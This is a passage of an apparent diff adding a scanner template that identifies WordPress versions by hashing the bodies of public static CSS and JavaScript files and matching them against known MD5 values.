"(\"f9b551130b9b64f5b772faf8601bd0b9\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.1 + dsl: + - "(\"0fade283565e4a3ce4ec55de896791ed\" == md5(body))" + - type: dsl + name: 5.2.2 - 5.2.9 + dsl: + - "(\"5b46ede1ee578828803f29bad065bd2a\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"03387f19e695ffcce6b2bbcef4eacc3f\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"1489f2a35f823f68c83976019fe84445\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"655c83f4842aefbb938674e7665adce9\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"ee4d04d2c5c499c1688ba37184e6f507\" == md5(body))" + - type: dsl + name: 
5.5 - 5.5.3 + dsl: + - "(\"c199a3e351b24d9a9f8a430d20e9140e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3ff0f57179a095756247065a3cdb13e2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/media-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"b6f1ebbe7e429a30e78b3e57194c2b99\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"d5fbbc80155b5414f2a4da9c852bb9c0\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"5f7e742e81a02e1181c35920268c8a51\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"73221f55eb1c209fe229f90739d83d37\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"2220b30c104b1bfc28ce0d57294630ff\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"23aabbc47036a0feaaed7f25d4863cfb\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"b5f2073fd98bf22e2f2b2353a2475f9f\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"ebdfa9a5981fc4adc6421b8c8f2fbdab\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"4987695c2fdde552b9723a7a23eb33a4\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"f79e045e230423e774bbc42b7a1a7085\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"2203b97d07d9fe77d9d39f2287e81c0f\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"ed5e5527b5bd5a5bca516e801dc1dc0b\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"a3f07d2e699aff8d66db9352172f3c41\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"d166fa753a4ac9638dfcc8b53a3b844c\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"dad7c0350214e95c8c1a79d35f45fec7\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"1abfd70d037a1e2dff56fcccf1f6ab10\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"b6c8a448b7deb1e19bf999ea1872b2e3\" == md5(body))" + - type: dsl + name: 2.7 - 2.8.6 + dsl: + - 
"(\"8d9762bb606d52329ce469823b56119d\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"22448b7afc80e35414de05dc7d648e0b\" == md5(body))" + - type: dsl + name: 2.5 - 2.6 + dsl: + - "(\"573f2f2acef97cb56ad89ef9a3817854\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"166984f6b0e07f10e505addb8197d0fc\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"954b5c4a4a4f15fac61f4fc17bf58e61\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"e6379fac5e741a344df826d46d84e69a\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.1 + dsl: + - "(\"3df6ed7e42905e3c50cee2540641492e\" == md5(body))" + - type: dsl + name: 5.2.2 - 5.2.9 + dsl: + - "(\"f19d0ab7d3f70930a10cd4b041a6e6bd\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"845b45ebe24b66d634755bb35a4327fd\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"e59be28d8c4b1ddb2b5b0c7200d85556\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"0b4b36860bd56854766cf368240db3a5\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"a45df3bb81bd0080863cf69e7f98546e\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"63c7307a8612335027f0fd90741a5777\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"308362946172efe2e4ec1a2255ac263c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement-and-player.min.js" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"8970e6e672a1d312c8d8ef471ffb7d5f\" == md5(body))" + - type: dsl + name: 4.4.3 - 4.5.23 + dsl: + - "(\"1490850465047bbde4cb3a08d257aa8e\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.1 + dsl: + - "(\"53972f85761d00c950a6554b55f46f29\" == md5(body))" + - type: dsl + name: 4.3.4 - 4.3.25 + dsl: + - "(\"7c839ada5992116eb525cabad56fec5a\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.3 + dsl: + - "(\"1abc152ca7ae762a29ac997bc779a187\" == md5(body))" + - type: dsl + name: 4.2.8 - 4.2.29 + dsl: + - 
"(\"906a6c1b6d7568099ef0358ecafdd754\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.7 + dsl: + - "(\"a3a3353ab882870300207675fa6b1b83\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"8240ce3d6dfd3ffaaa20d71c67b9e5dd\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"35a97e9df26614992044479b84cde48b\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"0015bf4818e9adf776ef6a35e791b855\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"89f8f0d4de00fe86d5a452bbb65bb02c\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"9075ef6303cc251092a0d6bfdd3a2093\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"0c279a4de1ca848917f96892e58345d2\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"c6d1f8e334ded732e83231a64de3fd3f\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6de31d697a1b1b2b0e2a3b29b1fb458b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/wp-pointer-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"4bd99a74dbfee792e9cde7c641ed51b7\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.19 + dsl: + - "(\"456e10f2561e65f2b76c1985b657ebdb\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"f2fbd40d135802525dedae9d5d02564e\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"6c3e135352318e69b359fc37bff0b3bc\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"5e414da7c33e52e8ee53ae20cc2c3bd8\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"84e05e2ca97a0e4c401ef3a99ae61bd9\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"83a66b2977cbedbb9ba412606f1f13c1\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"264b969d3c1ba2cc8eb3df7fe4feaaaf\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"73c9bdb9277ec76f0d6842368f0cddf6\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - 
"(\"013fb2b4de66e81cb7378f931fc93ffb\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"a35fbcb6a0ef77a051a7415a11eb6027\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"249e68e8463fc816b70c106ea7001355\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"bbbacea8c1892bf4c4fead1e460fead7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/wp-pointer.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"e98bb215ae58020de55852487229119e\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.19 + dsl: + - "(\"7e9fd782602ead0ddd91ecbe600bb078\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"f073040db3f47a4718a1711018ae9980\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"f2c8a14e896d48cb9f2c3367228ef562\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"51b755f1d00ecfe6c97c681b712a1f79\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"b47a82b97d5d40971429a3cace9e8e24\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"3f78b74716ff99d6bc9f0101998d1633\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"2db0af168008dd4ba838cda3e111ebe4\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"09aba215976d5cba6afa711a1cd777f3\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"f4911a0d886fb507fac33870531837ce\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"981c69b911ff9d4432bf82c080cfc7c7\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"9ee1087f5cd30436a78f4ae1ef9e53ae\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"1663817600108d76e57fbcb708a272f3\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"bfbbb17f5deaa73a3fffb7c639aca12e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b33603a27d12bd346e305a15d175ea11\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/wp-pointer.css" + matchers: 
+ - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"89df3c3fdb1a28e9553addd2c0a51e2e\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.19 + dsl: + - "(\"82eeae4c68288d28c8809ef9fb1bc3ea\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"42634848a1d576496e3a3fcc4848aa08\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"3d7c74b9bf7260ded6960f7d7c3f1e9c\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"83fefeea5786545e775f25941e482d13\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"60071f8937b8c3fad00dc801e715fa45\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"8f3b6483f012f1d94891105a97acefcf\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"7e45d0e701aead8de6f0e9ab63b15741\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"5c863bd1b2e60bb2dbff75f1b6051b0f\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"59f806e4f2c05775d4716684d184bca2\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"dba6014d7ae5dad33ec8d7bad4d23d85\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"9f865744182beb7411b3ce6ab09a49db\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.0.11 + dsl: + - "(\"8b0b4f07ee0da51fb5b48944e20b4c11\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"d22ab774b9d7d1c7540d075a734baa89\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"799cbb233336f9dec91766a0a786c7c9\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"509195f639213b5e82163c84842a2fd8\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"87cc1bc8d497f0b0a5ce8124c0befda3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.js" + matchers: + - type: dsl + name: 4.5.3 - 5.0.4 + dsl: + - "(\"8610f03fe77640dee8c4cc924e060f12\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.2 + dsl: + - "(\"d2d3169ca79b3eabf7ca582222fbddd3\" == md5(body))" + - type: dsl + name: 4.3 - 
4.4.24 + dsl: + - "(\"207abeb83412721d556faeba36e00822\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"4e2a6874f8b028fa23591492284a1643\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"25c76e632c1ee2f2d25292b72acc17d4\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"9f78bc4ac0da184bdd6733ffa7e5e599\" == md5(body))" + - type: dsl + name: 3.6.1 - 3.8.35 + dsl: + - "(\"92c9ccfa9216499d48ecc11e6d9887d5\" == md5(body))" + - type: dsl + name: 3.6 + dsl: + - "(\"9dcde2d5e8aeda556a0c52239fa2f44c\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"baae1db8cca4abb2265b0a6e01f1beed\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"d2985bb2ef1e276824161ffb6fa91338\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"6f79194a85c68f4e3c325aba0eeebd63\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"24cdab29f8a402a6f8f55e69dc56e429\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"b600f5c9cc254ffca5501d2cfefa1a4a\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"518215c646beff570b8d9849429139d4\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"25e59325cb47d2ab5ea650d47f431a9c\" == md5(body))" + - type: dsl + name: 2.6 - 2.7.1 + dsl: + - "(\"5308064654748a85218f8cf04ac5f8e8\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"7cc62f895d635b404ae0a37c13dcd6c5\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"d5753af0d384857ca34bf8b54c5eb417\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"290a21c83be5e11f93b86ff1bf8d4cd2\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"bb33093a8d4f68199c4ab6702f3976e4\" == md5(body))" + - type: dsl + name: 5.1.2 - 5.5.3 + dsl: + - "(\"49edccea2e7ba985cadc9ba0531cbed1\" == md5(body))" + - type: dsl + name: 4.5.18 - 5.0.11 + dsl: + - "(\"dc5ba5044fccc0297be7b262ce669a7c\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - 
"(\"3bbf6f33a2484805c30cf0e4a4b1d526\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/sodium_compat/composer.json" + matchers: + - type: dsl + name: 5.2 + dsl: + - "(\"a3a1d156f395eb8f522dd29733e6f74d\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.3 + dsl: + - "(\"1969ec6eba483a0d2ba0672435bc086f\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.5.3 + dsl: + - "(\"81e61d0416ef452b86358743d7cebf7d\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"60d50bd04e4b70407da0a8158a0d8f7c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-api.min.js" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"8ef51dc05352b2544201b31f7e2c2aa3\" == md5(body))" + - type: dsl + name: 4.7.5 - 4.8 + dsl: + - "(\"5b04d3ac5a88211004528a50437a0b3c\" == md5(body))" + - type: dsl + name: 4.7.3 - 4.7.4 + dsl: + - "(\"ba06e5f6f4f18e895c0c10ce1d3fef94\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.2 + dsl: + - "(\"146b14e8c7935d8bd14eb521fb616a5e\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"632a0df5fc4f02477aa93f838530c4e0\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"ac19f388e35cadb800170d1e65928cce\" == md5(body))" + - type: dsl + name: 4.9.5 - 4.9.16 + dsl: + - "(\"cfe6bf3aec2963dbdcddb2daa7ed129c\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"8cf9672daeca232b3c1f93b1e8d130b0\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"b7d6e1947ae62e2bcf6973d884b1a105\" == md5(body))" + - type: dsl + name: 5.4 - 5.5.3 + dsl: + - "(\"99b1ca16bcc61ef31b8874a6a516532e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b75b493914b2c89b9361c6e79622b5c1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/wp-pointer-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"eafe3262c7b7af6d8c71850eef377b1c\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.19 + dsl: + - "(\"8bb0bef9034c514f114e05ff9fc63840\" == md5(body))" + - type: dsl 
+ name: 4.4 - 4.4.24 + dsl: + - "(\"5efef129253ea15d5742c8985a5e5acc\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"d7e0cd8698b0111eee1a6a5f8b4c924a\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"d1469cd4079832849dad2664ea765a40\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"1ecc35e34576c2f9a22b31a04c05db4b\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"a2fdd3f6cecdad170c8b388b62451441\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"4711e5e8702a25a94284a833dd04cebf\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"d7ab0fb6d3a327f2fc6502591566656e\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.0.11 + dsl: + - "(\"e186e8b2e5b4ad9ef0a083ca5886e1d7\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"f42570055f49a16bcb1217a556e3049f\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"9799a726551e5c0f2dc8721e0701057c\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"b8f963b6af881302043b3170e8ad78bb\" == md5(body))" + - type: dsl + name: 5.4 - 5.5.3 + dsl: + - "(\"c0a39227c87b13e72b44fa2cd9cfb548\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"ed0285f2d68006a3cce1d14f213fd6c6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/data.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"f8150bf25c1f1038994b1b21d31db081\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"cec32f67b9c0c87140fa5506316ba63e\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"07c02f5b612470483def32a975cd96cf\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"d3bbd3eea7bbe3508e81ebd69f2c45d2\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"ae925003420ddd0a00ca0b9dede3911e\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"ab2ac3c24c6921bc62dead8f7a2267af\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - 
"(\"bdd721bf9bc67380f681a5aacbccc827\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"b1df6eefe4d9b8d17f003a25aa50d999\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"cb8fd9b7446107dc460554e552138237\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9caf2f73114f2e3f111548fa0669f723\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/data.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"ddae0e533511267d25e72243e346d4b9\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"3b747c638a1a5115feda5deff0ba7977\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"8a70f593b4e1c7255d1477a5b943de61\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"709d82aee58b22ca25ec93d1c75e3a78\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"d4dd45e5ed9e1a5015652407e00b2c2d\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"c8bcea679c39308667547a54fef94033\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"c0e04a64999dceed7d32e5455f7402d3\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"b212c688591871d0ff504bbb9f9e0b9c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"9feabbcf952b4312e2cac9c5cf0dce2a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"64693be9b6a8e520d1ed862cb379d59e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/edit-post/style-rtl.css" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"3ef042e6dc51effffd675f5d8d67234d\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"a9da3ceda6dfce34b69fe1bc3b1f5ee6\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"5383b047c37cd2d5c32d299959c98a12\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"43521c1618feed87b76ba61e7a1e1405\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"caf92f80f4c581ade5f5205f9a943029\" == 
md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"58e016381723ce43b79381262b17cdff\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"adbce747f3f9a2a3505d0ec6a6bd56da\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"ed723421685d554887d928897ba9ca45\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"0d62ac9769fb2588f888cb7b959c6e98\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6decca5ae4874d5c90a9d85e2e9d3f57\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/edit-post/style.css" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"e33bc955f23a2ccf06c284ff2b1c2a12\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"7d8068d9ae8977783cd06a11929f3b56\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"4dea956ce093170c82bd7062d07064b8\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"719e21ee8faf57740ee065959f4f742f\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"578e6bc0b5b398648956c85f5fecd801\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"029c6c1101d85e943386f69e65bf6f26\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"cd9314a77b72e3be21c45fa617d10a7f\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"fbf2f30961ba450c95233ebd563c64f5\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"06c30ccc5b4b2aeba1cba0cc1ace5ea4\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c0dc622a8bca4d16a05f59e19362fc17\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/media-models.min.js" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"eed9813bad592d4287be0eb0ebb68497\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"bc01c1de1fdb0176783247e8a754a60b\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.24 + dsl: + - "(\"757f7c05171d7ab9fb8c6b4ed8a68aa0\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + 
dsl: + - "(\"261fa850fde903097779eb27336f8c20\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"b68e8e137e8507dc7341f42269c228e6\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"9b857d69f581fdac6ebcdd81b856b856\" == md5(body))" + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"def5272789e7da0fd60524d1ebf96a98\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"f0b1936032cc0dc2dab420241d891412\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"7dcae0648406b44bfe02151f2af361e2\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"6fbf98b8a1f49c729b0f50628b01b9f7\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"593e7c8882f465ea251aa3707010969a\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"b631c2ad1ed6830c14f1b5b746cc33b4\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"8581d9247dda1ddbdbc45bc7cba3a3fd\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"0e6f148cf0f67e2d29308754faef6829\" == md5(body))" + - type: dsl + name: 4.2.25 - 4.2.29 + dsl: + - "(\"25c8433aba855aa1839135b9e2d019b8\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"a372a9be9eb7e7e3a40e6f8c2bc52573\" == md5(body))" + - type: dsl + name: 5.4 - 5.5.3 + dsl: + - "(\"6ef4e6c8f6c08e1558bd9cb500e49b9c\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"a9329bba26e0cca4a47d899398f93117\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"540ad54618f4e167bd5eb00e305fd0f6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/theme-plugin-editor.min.js" + matchers: + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"ebd5a282a3cbe917233b9355f85e02e2\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"88918bacdc9909f8ca06a13085e33bb2\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"cc1a6596f81f2efc3b0ef5882d8b4d00\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - 
"(\"31d01c6329bd9ca0f85d08d30571cedb\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"0c0b505c870b8e06552dbd22533f1de2\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.5.3 + dsl: + - "(\"d7eeb3247587fe927808ab06acd7c64e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8dbc8c7e53f66b2da6a88bd90764a161\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/theme-plugin-editor.js" + matchers: + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"520d3d51ba9b168fd8ebdec6fe62355c\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"53b16e979e15d15b8665a518b3498b6c\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"9744d1c4fab5fcbc74d4d739b75f08e1\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"2d0388d3ce8f3e030adc78907f661184\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.5.3 + dsl: + - "(\"268eba9cd3dcfde30616dcc01a44cf96\" 